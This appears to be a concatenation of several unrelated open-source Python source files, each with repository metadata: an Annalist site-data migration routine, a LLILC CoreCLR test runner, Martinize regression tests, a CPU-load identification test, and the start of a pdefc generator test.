if os.path.isdir(old_users1) or os.path.isdir(old_vocabs1):
print("Copy Annalist old user and/or vocab data from %s"%site_data_old1)
migrate_old_data(site_data_old1, layout.USER_DIR_PREV, site_data_tgt, layout.USER_DIR )
migrate_old_data(site_data_old1, layout.VOCAB_DIR_PREV, site_data_tgt, layout.VOCAB_DIR)
# c/_annalist_site/_annalist_collection/ - using new dir names
site_data_old2 = os.path.join(sitebasedir, site_layout.SITEDATA_OLD_DIR2)
old_users2 = os.path.join(site_data_old2, layout.USER_DIR)
old_vocabs2 = os.path.join(site_data_old2, layout.VOCAB_DIR)
if os.path.isdir(old_users2) or os.path.isdir(old_vocabs2):
print("Copy Annalist old user and/or vocab data from %s"%site_data_old2)
migrate_old_data(site_data_old2, layout.USER_DIR_PREV, site_data_tgt, layout.USER_DIR )
migrate_old_data(site_data_old2, layout.VOCAB_DIR_PREV, site_data_tgt, layout.VOCAB_DIR)
# --- Archive old site data so it's not visible next time
if os.path.isdir(site_data_old1):
archive_old_data(site_data_old1, "")
if os.path.isdir(site_data_old2):
archive_old_data(site_data_old2, "")
# --- Copy latest site data to target directory
print("Copy Annalist site data")
print("from %s"%site_data_src)
for sdir in layout.DATA_DIRS:
print("- %s -> %s"%(sdir, site_data_tgt))
Site.replace_site_data_dir(sitedata, sdir, site_data_src)
for sdir in (layout.USER_DIR, layout.VOCAB_DIR):
print("- %s +> %s"%(sdir, site_data_tgt))
Site.update_site_data_dir(sitedata, sdir, site_data_src)
for sdir in (layout.INFO_DIR,):
print("- %s ~> %s"%(sdir, site_data_tgt))
Site.expand_site_data_dir(sitedata, sdir, site_data_src)
for sdir in layout.COLL_DIRS_PREV:
remove_old_data(site_data_tgt, sdir)
print("Generating context for site data")
sitedata.generate_coll_jsonld_context()
# --- Copy provider data to site config provider directory
provider_dir_src = os.path.join(annroot, "annalist/data/identity_providers")
provider_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "providers")
print("Copy identity provider data:")
print("- from: %s"%(provider_dir_src,))
print("- to: %s"%(provider_dir_tgt,))
ensure_dir(provider_dir_tgt)
updatetree(provider_dir_src, provider_dir_tgt)
# --- Copy sample system configuration files to config directory
config_dir_src = os.path.join(annroot, "annalist/data/config_examples")
config_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "config")
print("Copy system configuration sample files:")
print("- from: %s"%(config_dir_src,))
print("- to: %s"%(config_dir_tgt,))
ensure_dir(config_dir_tgt)
updatetree(config_dir_src, provider_dir_tgt)
return status
def migrate_old_data(old_site_dir, old_data_dir, new_site_dir, new_data_dir):
"""
Migrate data from a single old-site directory to the new site
"""
old_dir = os.path.join(old_site_dir, old_data_dir)
new_dir = os.path.join(new_site_dir, new_data_dir)
if os.path.isdir(old_dir):
print("- %s +> %s (migrating)"%(old_dir, new_dir))
updatetree(old_dir, new_dir)
archive_old_data(old_site_dir, old_data_dir)
return
def archive_old_data(site_dir, data_dir):
"""
Archive old data no longer required.
"""
# print("@@ site_dir %s, data_dir %s"%(site_dir, data_dir))
old_dir = os.path.join(site_dir, data_dir)
if os.path.isdir(old_dir):
if old_dir.endswith("/"):
old_dir = old_dir[:-1]
old_dir_arc = old_dir+".saved"
print("- %s >> %s (rename)"%(old_dir, old_dir_arc))
os.rename(old_dir, old_dir_arc)
return
def remove_old_data(site_dir, data_dir):
"""
Remove old data no longer required.
"""
old_dir = os.path.join(site_dir, data_dir)
if os.path.isdir(old_dir):
print("- %s (remove)"%(old_dir,))
removetree(old_dir)
return
# End.
|
gklyne/annalist
|
src/annalist_root/annalist_manager/am_createsite.py
|
Python
|
mit
| 12,192
|
#!/usr/bin/env python
#
#title :llilc_runtest.py
#description :
#
# This script runs CoreCLR test with specified LLILC JIT and pre-built
# CoreCLR runtime. If verbose level is specified, either summary or
# verbose, a result will be created in default location or a place
# that is specified. In verbose case, the result will be normalized
# with filter.
#
# It is required to run this script from tests directory in a CoreCLR
# repository.
#
# To exclude undesired test cases, please edit exclusion.targets file.
#
# usage: llilc_runtest.py [-h] [-a {x64,x86}] [-b {debug,release}] [-p] [-n]
# [-d {summary,verbose}] [-r RESULT_PATH] -j JIT_PATH -c
# CORECLR_RUNTIME_PATH
#
# optional arguments:
# -h, --help show this help message and exit
# -a {x64,x86}, --arch {x64,x86}
# the target architure
# -b {debug,release}, --build {debug,release}
# release or debug build of CoreCLR run-time used
# -d {summary,verbose}, --dump-level {summary,verbose}
# the dump level: summary, or verbose
# -n, --ngen Use ngened mscorlib
# -p, --precise-gc Test with Precise GC (default: Test with Conservative GC)
# -s, --insert-statepoints
# Test with Statepoints inserted, regardless of GC settings.
# -r RESULT_PATH, --result-path RESULT_PATH
# the path to runtest result output directory
#
# required arguments:
# -j JIT_PATH, --jit-path JIT_PATH
# full path to jit .dll
# -c CORECLR_RUNTIME_PATH, --coreclr-runtime-path CORECLR_RUNTIME_PATH
# full path to CoreCLR run-time binary directory
#
#==========================================================================================
import argparse
import time
import os
import shutil
import glob
import sys
import stat
import subprocess
import applyfilter
import const
# Return OS name used internally in paths
def OSName():
if os.name == 'nt':
return 'Windows_NT'
else:
return 'Unknown'
# Return the path of built test path relavtive to coreclr tests directory
def BuiltTestPath(arch, build):
built_test_directory = OSName() + '.' + arch + '.' + build
built_test_path = os.path.join('..', 'bin', 'tests', built_test_directory)
return built_test_path
# Exculde top level test directories
def ExcludeTopLevelTestDirectories():
os.environ['SkipTestAssemblies'] = 'Common;Exceptions;GC;Loader;managed;packages;Regressions;runtime;Tests;TestWrappers_x64_release;Threading'
# Remove unwanted test result files
def CleanUpResultFiles(path):
try:
for root, subdirs, files in os.walk(path):
for file in files:
if not file.endswith('error.txt'):
file_path = os.path.join(root, file)
os.remove(file_path)
except OSError:
pass
# Return default result path if result is generated
def DefaultResultPath():
default_result_path = os.environ['TEMP']
default_result_path = os.path.join(default_result_path, 'LLILCTestResult')
return default_result_path
# Remove readonly files
def del_rw(action, name, exc):
os.chmod(name, stat.S_IWRITE)
os.remove(name)
# Count files in a directory
def CountFiles(path, suffix):
total = 0
for root, sub_dirs, files in os.walk(path):
for file_name in files:
if file_name.endswith(suffix):
total = total + 1
return total
# Expand the absolute path
def expandPath(path):
return os.path.abspath(os.path.expanduser(path))
def main(argv):
# define return code const value
const.RunTestFail = 1
const.RunTestOK = 0
const.GeneralError = -1
const.UnknownArguments = -2
const.NormalizationFail = -3
const.InvalidPath = -4
# Parse the command line
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--arch', type=str, choices={'x86', 'x64'},
default='x64', help='the target architure')
parser.add_argument('-b', '--build', type=str, choices={'release', 'debug'},
default='debug', help='release or debug build of CoreCLR run-time used')
parser.add_argument('-d', '--dump-level', type=str, choices={'summary', 'verbose'},
help='the dump level: summary, or verbose')
parser.add_argument('-r', '--result-path', type=str,
default=DefaultResultPath(), help='the path to runtest result output directory')
parser.add_argument('-t', '--runtest-path', type=str,
default=None, help='the full path to the CoreCLR\\tests directory')
parser.add_argument('-n', '--ngen', help='use ngened mscorlib', default=False, action="store_true")
parser.add_argument('-s', '--insert-statepoints', help='Insert GC Statepoints',
default=False, action="store_true")
parser.add_argument('-p', '--precise-gc', help='test with precise gc', default=False, action="store_true")
required = parser.add_argument_group('required arguments')
required.add_argument('-j', '--jit-path', required=True,
help='full path to jit .dll')
required.add_argument('-c', '--coreclr-runtime-path', required=True,
help='full path to CoreCLR run-time binary directory')
args, unknown = parser.parse_known_args(argv)
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
return const.UnknowArguments
coreclr_runtime_full_path = expandPath(args.coreclr_runtime_path)
if (not os.path.isdir(coreclr_runtime_full_path)):
print('Please specify valid --coreclr-runtime-path to CoreCLR run-time binary directory')
return const.InvalidPath
jit_full_path = expandPath(args.jit_path)
if (not os.path.isfile(jit_full_path)):
print('Please specify valid --jit-path to the jit .dll')
return const.InvalidPath
print('path',args.result_path)
result_full_path = expandPath(args.result_path)
print('Result path: ', result_full_path);
# Ensure the command run from a CoreCLR tests directory
runtest_dir = args.runtest_path
if (args.runtest_path is None):
runtest_dir = os.getcwd()
# All platforms other than Windows run runtest.sh
runtest_full_path = os.path.join(runtest_dir, 'runtest.sh')
# On Windows, we will run runtest.cmd
if sys.platform == "win32":
runtest_full_path = os.path.join(runtest_dir, 'runtest.cmd')
if (not os.path.isfile(runtest_full_path)):
print('Please specify --runtest-path or run from theests directory in a CoreCLR repository')
return const.InvalidPath
try:
# Determine the built test location
build_test_path = BuiltTestPath(str(args.arch), str(args.build))
# Determine time stamp
time_stamp = str(time.time()).split('.')[0]
# Copy in llilcjit.dll with time stamp
time_stamped_jit_name = 'LLILCJit' + time_stamp + '.dll'
time_stamped_jit_path = os.path.join(coreclr_runtime_full_path, time_stamped_jit_name)
shutil.copy2(jit_full_path, time_stamped_jit_path)
# Create llilctestenv.cmd with time stamp
time_stamped_test_env_name = 'LLILCTestEnv' + time_stamp + '.cmd'
time_stamped_test_env_path = os.path.join(coreclr_runtime_full_path, time_stamped_test_env_name)
# Todo: Test Env is right now only for Windows. Will expand when cross platform
with open(time_stamped_test_env_path, 'w') as test_env:
test_env.write('set COMPlus_AltJit=*\n')
test_env.write('set COMPlus_AltJitName=' + time_stamped_jit_name + '\n')
if (args.precise_gc):
test_env.write('set COMPlus_InsertStatepoints=1\n')
else:
test_env.write('set COMPlus_GCConservative=1\n')
if (args.insert_statepoints):
test_env.write('set COMPlus_InsertStatepoints=1\n')
if (not args.ngen):
test_env.write('set COMPlus_ZapDisable=1\n')
test_env.write('chcp 65001\n')
if args.dump_level is not None:
test_env.write('set COMPlus_DumpLLVMIR=' + args.dump_level + '\n')
# Exclude undesired tests from running
ExcludeTopLevelTestDirectories()
except:
e = sys.exc_info()[0]
print('Error: RunTest failed due to ', e)
return const.GeneralError
# Run the test
return_code = const.RunTestOK
exclusion = os.path.join(os.path.dirname(__file__), 'exclusion.targets')
runtest_command = runtest_full_path + ' ' + args.arch + ' ' + args.build
runtest_command = runtest_command + ' Exclude ' + exclusion
runtest_command = runtest_command + ' Testenv ' + time_stamped_test_env_path
runtest_command = runtest_command + ' ' + coreclr_runtime_full_path
print(runtest_command)
error_level = subprocess.call(runtest_command, shell=True)
if error_level == 1:
return_code = const.RunTestFail
# Remove temporary time-stamped jit and test env files
try:
os.remove(time_stamped_jit_path)
os.remove(time_stamped_test_env_path)
except:
e = sys.exc_info()[0]
print('Error: RunTest failed due to ', e)
return const.GeneralError
# Copy out result if there is one, clean up undesired files,
# In case of verbose result, normalize it and extract out summary.
# In case of summary result, rename all result file name.
if args.dump_level is not None:
try:
coreclr_result_path = os.path.join(build_test_path, 'Reports')
if os.path.exists(result_full_path):
shutil.rmtree(result_full_path, onerror=del_rw)
shutil.copytree(coreclr_result_path, result_full_path)
CleanUpResultFiles(result_full_path)
total = CountFiles(result_full_path, 'error.txt')
if args.dump_level == 'verbose':
print('Verbose-mode post-processing started')
print('found ', total, 'valid raw test outputs (error.txt) under ', str(coreclr_result_path))
print('creating normalized outputs (error.txt) under ', str(result_full_path))
print('creating summary outputs (sum.txt) under ', str(result_full_path))
applyfilter.ApplyAll(result_full_path)
print('Verbose-mode post-processing finished')
if args.dump_level == 'summary':
print('Summary-mode post-processing started')
print('found ', total, 'valid raw test outputs (error.txt) under ', os.path.abspath(coreclr_result_path))
print('creating summary outputs (sum.txt) under ', str(result_full_path))
applyfilter.SummaryRenameAll(result_full_path)
print('Summary-mode post-processing finished')
except:
e = sys.exc_info()[0]
print('Error: Test result normalization failed due to ', e)
return const.NormalizationFail
else:
print('No post-processing needed.')
return return_code
if __name__ == '__main__':
return_code = main(sys.argv[1:])
sys.exit(return_code)
|
dkorolev/llilc
|
test/llilc_runtest.py
|
Python
|
mit
| 11,351
|
#!/usr/bin/env python
# MARTINIZE
# A simple, versatile tool for coarse-graining molecular systems
# Copyright (C) 2017 Tsjerk A. Wassenaar and contributors
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""
Regression tests for martinize.
This test suite runs the insane command line with various set of arguments, and
assess that the results correspond to the result obtained with previous
versions.
Notice that these tests do not assess that the results are correct. Instead,
they assess that changes do not affect the behaviour of the program.
If ran as a script, this generate the reference files expected by the tests. If
ran usinf pytest or nosetest, this executes insane with a series of arguments
and compares the output to the reference.
"""
from __future__ import print_function
import contextlib
import functools
import glob
import mock
import os
import random
import shutil
import shlex
import subprocess
import sys
import tempfile
import textwrap
import importlib
import testfixtures
from nose.tools import assert_equal, assert_raises
import utils
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
from itertools import izip_longest as zip_longest
except ImportError:
from itertools import zip_longest
PROGRAM = 'martinize'
CLI = importlib.import_module(".".join([PROGRAM, "cli"]))
HERE = os.path.abspath(os.path.dirname(__file__))
EXECUTABLE = utils.which(PROGRAM)
DATA_DIR = os.path.join(HERE, 'data')
INPUT_DIR = os.path.join(HERE, 'data', 'inputs')
RANDSEED = '42'
SEED_ENV = 'INSANE_SEED'
PDB_LIST = ('1ubq', '3csy', '2qwo', '1a8g', '2oar') #, '1cag')
FF_LIST = (
'martini21', 'martini21p',
'martini22', 'martini22p',
'elnedyn', 'elnedyn22', 'elnedyn22p',
'elnedyn_BBbonds', 'elnedyn_BBconstr',
'elnedyn22_BBbonds', 'elnedyn22_BBconstr',
'elnedyn22p_BBbonds', 'elnedyn22p_BBconstr',
)
# The arguments to test insane with are listed here. The tuple is used both to
# generate the references, and to run the tests.
# To add a test case, add the arguments to test in the tuple.
SIMPLE_TEST_CASES = [
('-f {}.pdb'.format(pdb), pdb) for pdb in PDB_LIST
]
SIMPLE_TEST_CASES.extend([
# Examples from the martini tutorial
# <http://cgmartini.nl/index.php/tutorials-general-introduction-gmx5/proteins-gmx5>
('-f 1ubq.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-dssp dssp -p backbone -ff martini22', '1ubq'),
('-f 1ubq.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-ss chainA.ss -p backbone -ff martini22', '1ubq-ss'),
('-f 1a8g.pdb -o system-vaccum.top -x 1A8G-CG.pdb '
'-dssp dssp -p backbone -ff martini22', '1a8g'),
('-f 1a8g.pdb -o system-vaccum.top -x 1A8G-CG.pdb '
'-dssp dssp -p backbone -ff martini22 '
'-elastic -ef 500 -el 0.5 -eu 0.9 -ea 0 -ep 0', '1a8g', '1a8g-elastic'),
('-f 1a8g.pdb -o system-vaccum.top -x 1UBQ-CG.pdb '
'-dssp dssp -p backbone -ff elnedyn22', '1a8g'),
])
SIMPLE_TEST_CASES.extend([
# Examples taken from Djurre's tests
# <https://github.com/cgmartini/martinize.py/blob/master/test/test.sh>
('-f 1ubq.pdb -o 1UBQ_cg.top -x 1UBQ_cg.pdb '
'-ss ~EEEEEETTS~EEEEE~~TTSBHHHHHHHHHHHH~~~GGGEEEEETTEE~~TTSBTGGGT~~TT~EEEEEE~~S~~',
'1ubq', '1ubq-inline-ss'),
('-f 2oar.pdb -o 2OAR_cg.top -x 2OAR_cg.pdb '
'-sep -nt -p All -pf 500 -dssp dssp -ff martini22', '2oar'),
('-f 1cag.pdb -o 1CAG_cg.top -x 1CAG_cg.pdb -collagen -ff martini22', '1cag'),
('-f 3sjm.pdb -o 3SJM_cg.top -x 3SJM_cg.pdb -collagen -ff martini22dna', '3sjm'),
])
SIMPLE_TEST_CASES.extend([
('-f 1l35.pdb -o 1L35_cg.top -x 1l35_cg.pdb '
'-cys auto -name lysozyme -dssp dssp -ed -ff {}'.format(ff), '1l35')
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f 1a8g.pdb -merge A,B', '1a8g'),
('-f 2oar.pdb -merge A,B,C -merge D,E', '2oar'),
('-f 1ubq.gro -x 1ubq-cg.pdb', '1ubq-gro'),
('-f 1ubq.gro -x 1ubq-cg.pdb -dssp dssp', '1ubq-gro'),
('-f 1ubq.pdb -x cg.pdb -o cg.top '
'-ss CEEEEEETTSCEEEEECCTTSC1111HHHH2222CCCCCCEEEEETTEECCTTSCTCCCTCCTTCEEEEEECCSCC',
'1ubq', '1ubq-explicit-ss-from-self'),
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -ff {} -x cg.pdb -o cg.top'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -ff {} -dssp dssp -x cg.pdb -o cg.top'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -nmap nmap.idx -ff {}'.format(pdb, ff), pdb)
for pdb in PDB_LIST
for ff in FF_LIST
])
SIMPLE_TEST_CASES.extend([
('-f {}.pdb -n index.idx'.format(pdb), pdb) for pdb in PDB_LIST
])
SIMPLE_TEST_CASES.extend([
('-f 2oar.pdb -x cg.pdb -ff martini22.json', 'json22'),
])
def _arguments_as_list(arguments):
"""
Return the arguments as a list as expected by subprocess.Popen.
The arguments can be provided as a string that will be spitted to a list.
They can also be provided as a list, then the list will be returned
untouched.
"""
try:
arguments_list = shlex.split(arguments)
except ValueError:
arguments_list = arguments
return arguments_list
def _split_case(case):
"""
Get the arguments and the input directory from a test case.
"""
if len(case) == 3:
case_args, input_dir, alias = case
if input_dir is not None:
input_dir = os.path.join(INPUT_DIR, input_dir)
elif len(case) == 2:
case_args, input_dir = case
input_dir = os.path.join(INPUT_DIR, input_dir)
alias = case_args
else:
case_args = case
input_dir = None
alias = case_args
return case_args, input_dir, alias
def _reference_path(arguments, alias=None):
"""
Get the path to the reference files for the simple test cases.
"""
arg_list = _arguments_as_list(arguments)
simple_case_ref_data = os.path.join(DATA_DIR, 'simple_case')
base_name = arguments if alias is None else alias
return os.path.join(simple_case_ref_data, base_name)
def _run_external(arguments):
command = [EXECUTABLE] + arguments
env = {SEED_ENV: INSANE_SEED} if SEED_ENV else {}
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
out, err = process.communicate()
log = ''
return out, err, log, process.returncode
def _run_internal(arguments):
if SEED_ENV:
os.environ[SEED_ENV] = RANDSEED
random.seed(RANDSEED)
command = [EXECUTABLE] + arguments
out = StringIO()
err = StringIO()
with mock.patch('random.random', return_value=0.1):
with utils._redirect_out_and_err(out, err):
with testfixtures.LogCapture() as log:
returncode = CLI.main(command)
out = out.getvalue()
err = err.getvalue()
log = str(log)
return out, err, log, returncode
def run_program(arguments, input_directory=None, runner=_run_internal):
"""
Run program with the given arguments
Insane is run in a copy of `input_directory`.
"""
# Copy the content of the input directory in the current directory if an
# input directory is provided.
if input_directory is not None:
for path in glob.glob(os.path.join(input_directory, '*')):
if os.path.isdir(path):
shutil.copytree(path, '.')
else:
shutil.copy2(path, '.')
out, err, log, returncode = runner(arguments)
print("** {} exited with return code {}.".format(PROGRAM.capitalize(), returncode))
if returncode:
print(err)
return out, err, log, returncode
def run_and_compare(arguments, input_dir, ref_dir, runner):
"""
Run program and compare its output against a reference
"""
# Create the command as a list for subprocess.Popen.
# The arguments can be pass to the current function as a string or as a
# list of arguments. If they are passed as a string, they need to be
# converted to a list.
arguments = _arguments_as_list(arguments)
ref_stdout = os.path.join(ref_dir, 'stdout')
ref_stderr = os.path.join(ref_dir, 'stderr')
ref_log = os.path.join(ref_dir, 'testlog')
# We want program to run in a temporary directory. This allows to keep the
# file system clean, and it avoids mixing output of different tests.
with utils.tempdir():
out, err, log, returncode = run_program(arguments, input_dir, runner=runner)
assert not returncode
utils.compare(utils.ContextStringIO(out), ref_stdout)
utils.compare(utils.ContextStringIO(err), ref_stderr)
utils.compare(utils.ContextStringIO(log), ref_log)
utils.compare_directories('./', ref_dir,
ignore=('stderr', 'stdout', 'testlog'))
def _test_simple_cases():
"""
This function generates test functions for nosetests. These test functions
execute insane with the argument listed in SIMPLE_TEST_CASES.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
ref_gro, ref_top, ref_stdout, ref_stderr = _reference_path(case_args, alias)
# The test generator could yield run and compare directly. Bt, then,
# the verbose display of nosetests gets crowded with the very long
# names of the reference file, that are very redundant. Using a partial
# function allows to have only the arguments for insane displayed.
_test_case = functools.partial(
run_and_compare,
ref_gro=ref_gro,
ref_top=ref_top,
ref_stdout=ref_stdout,
ref_stderr=ref_stderr,
runner=_run_internal)
_test_case.__doc__ = ' '.join([EXECUTABLE, case_args])
yield (_test_case, case_args, input_dir)
def test_simple_cases_internal():
"""
This function generates test functions for nosetests. These test functions
calls insane's main function with the argument listed in SIMPLE_TEST_CASES.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
ref_dir = _reference_path(case_args, alias)
# The test generator could yield run and compare directly. Bt, then,
# the verbose display of nosetests gets crowded with the very long
# names of the reference file, that are very redundant. Using a partial
# function allows to have only the arguments for insane displayed.
_test_case = functools.partial(
run_and_compare,
ref_dir=ref_dir,
runner=_run_internal)
yield (_test_case, case_args, input_dir)
class TestGroTester(object):
"""
Test if the comparison of GRO file catches the differences.
"""
ref_gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
def test_equal(self):
"""
Make sure that identical files do not fail.
"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
utils.assert_gro_equal('ref.gro', 'ref.gro')
def test_diff_x(self):
"""
Make sure that error in coordinates is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.353 # Is not within tolerance
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_in_tolerance(self):
"""
Make sure that small errors in coordinates are not caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.352 # Is within tolerance
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
utils.assert_gro_equal('content.gro', 'ref.gro')
def test_diff_natoms(self):
"""
Make sure that differences in number of atom is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
6
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
1POPC C1A 5 2.125 14.651 11.051
1POPC D2A 6 2.134 14.602 10.751
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_title(self):
"""
Make sure that a different title is caught.
"""
gro_content = """\
A different title
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_box(self):
"""
Make sure that a different box is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1POPC PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 9.9 10 9.08 4 54"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def test_diff_field(self):
"""
Make sure that a difference in a field is caught.
"""
gro_content = """\
INSANE! Membrane UpperLeaflet>POPC=1 LowerLeaflet>POPC=1
4
1POPC NC3 1 2.111 14.647 11.951
1DIFF PO4 2 2.177 14.644 11.651
1POPC GL1 3 2.128 14.642 11.351
1POPC GL2 4 1.961 14.651 11.351
10 10 10"""
with utils.tempdir():
with open('ref.gro', 'w') as outfile:
print(textwrap.dedent(self.ref_gro_content),
file=outfile, end='')
with open('content.gro', 'w') as outfile:
print(textwrap.dedent(gro_content), file=outfile, end='')
assert_raises(AssertionError, utils.assert_gro_equal,
'content.gro', 'ref.gro')
def generate_simple_case_references():
"""
Run program to generate reference files for the simple regression tests.
"""
for case in SIMPLE_TEST_CASES:
case_args, input_dir, alias = _split_case(case)
arguments = _arguments_as_list(case_args)
ref_dir = _reference_path(case_args, alias)
ref_stdout = os.path.join(ref_dir, 'stdout')
ref_stderr = os.path.join(ref_dir, 'stderr')
ref_log = os.path.join(ref_dir, 'testlog')
if os.path.exists(ref_dir):
shutil.rmtree(ref_dir)
os.mkdir(ref_dir)
with utils.in_directory(ref_dir):
print(PROGRAM + ' ' + ' '.join(arguments))
out, err, log, _ = run_program(arguments, input_dir)
with open(ref_stdout, 'w') as outfile:
for line in out:
print(line, file=outfile, end='')
with open(ref_stderr, 'w') as outfile:
for line in err:
print(line, file=outfile, end='')
with open(ref_log, 'w') as outfile:
print(log, end='', file=outfile)
def clean_simple_case_references():
"""
Delete reference files for the simple tests if they are not in use anymore.
"""
simple_test_cases = [_split_case(case)[2] for case in SIMPLE_TEST_CASES]
simple_case_ref_data = os.path.join(DATA_DIR, 'simple_case')
for path in glob.glob(os.path.join(simple_case_ref_data, '*')):
base_name = os.path.basename(os.path.splitext(path)[0])
if base_name not in simple_test_cases:
print(path)
os.remove(path)
def main():
"""
Command line entry point.
"""
help_ = """
Generate or clean the reference files for program's regression tests.
{0} gen: generate the files
{0} clean: clean the unused files
nosetests -v: run the tests
""".format(sys.argv[0])
commands = {'gen': generate_simple_case_references,
'clean': clean_simple_case_references}
if len(sys.argv) != 2:
print(help_, file=sys.stderr)
sys.exit(1)
try:
commands[sys.argv[1]]()
#except KeyError:
# print("Unrecognized keyword '{}'.".format(sys.argv[1]))
# print(help_, file=sys.stderr)
# sys.exit(1)
finally:
pass
if __name__ == '__main__':
main()
|
Tsjerk/Martinize
|
tests/test_regression.py
|
Python
|
gpl-2.0
| 19,858
|
#!/usr/bin/python
#Authors: Gaetano Carlucci
# Giuseppe Cofano
import time
import json
import matplotlib.pyplot as plt
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../utils')
from Monitor import MonitorThread
from openLoopActuator import openLoopActuator
if __name__ == "__main__":
######################################################
# IDENTIFICATION TEST #
######################################################
# testing activities
# this test aims at characterizing the CPU
testing = 1
dynamics_plot_online = 0
if testing == 1:
sleepTimeSequence = [0.001, 0.005, 0.01, 0.02, 0.03, 0.08, 0.1, 0.15, 0.2, 0.3, 0.4, 0.5]
sleepTimeSequence = [0.001, 0.03, 0.02, 0.00, 0.04, 0.05, 0.03, 0.01, 0.2, 0.05, 0.01]
#sleepTimeSequence = [0.005, 0.02]
stepPeriod = 4
monitor = MonitorThread(0, 0.1)
monitor.start()
actuator = openLoopActuator(monitor, len(sleepTimeSequence) * stepPeriod, 0, dynamics_plot_online)
actuator.run_sequence(sleepTimeSequence)
monitor.running = 0
dynamics = monitor.getDynamics()
actuator.close()
monitor.join()
with open('identification_data', 'w') as outfile:
json.dump(dynamics, outfile)
else:
with open('identification_data', 'r') as outfile:
dynamics = json.load(outfile)
plt.figure()
fig, ax1 = plt.subplots()
ax1.set_ylabel('CPU Load (%)', color='b')
ax1.plot(dynamics['time'], dynamics['cpu'], 'b-')
ax1.set_xlabel('Time [ms]')
ax1.grid(True)
for tl in ax1.get_yticklabels():
tl.set_color('b')
ax2 = plt.twinx()
ax2.set_ylabel('Sleep Time Target(s)', color='r')
ax2.plot(dynamics['time'], dynamics['sleepTimeTarget'], 'r-')
ax2.grid(True)
for tl in ax2.get_yticklabels():
tl.set_color('r')
plt.savefig('Identification.png', dpi=100)
plt.close()
|
GaetanoCarlucci/CPULoadGenerator
|
tests/Identification2.py
|
Python
|
mit
| 2,038
|
# encoding: utf-8
import os
import shutil
import tempfile
import unittest
import pdefc
from pdefc import lang, objc
class TestGenerator(unittest.TestCase):
def setUp(self):
self.generator = objc.Generator(prefix='PD')
def package(self):
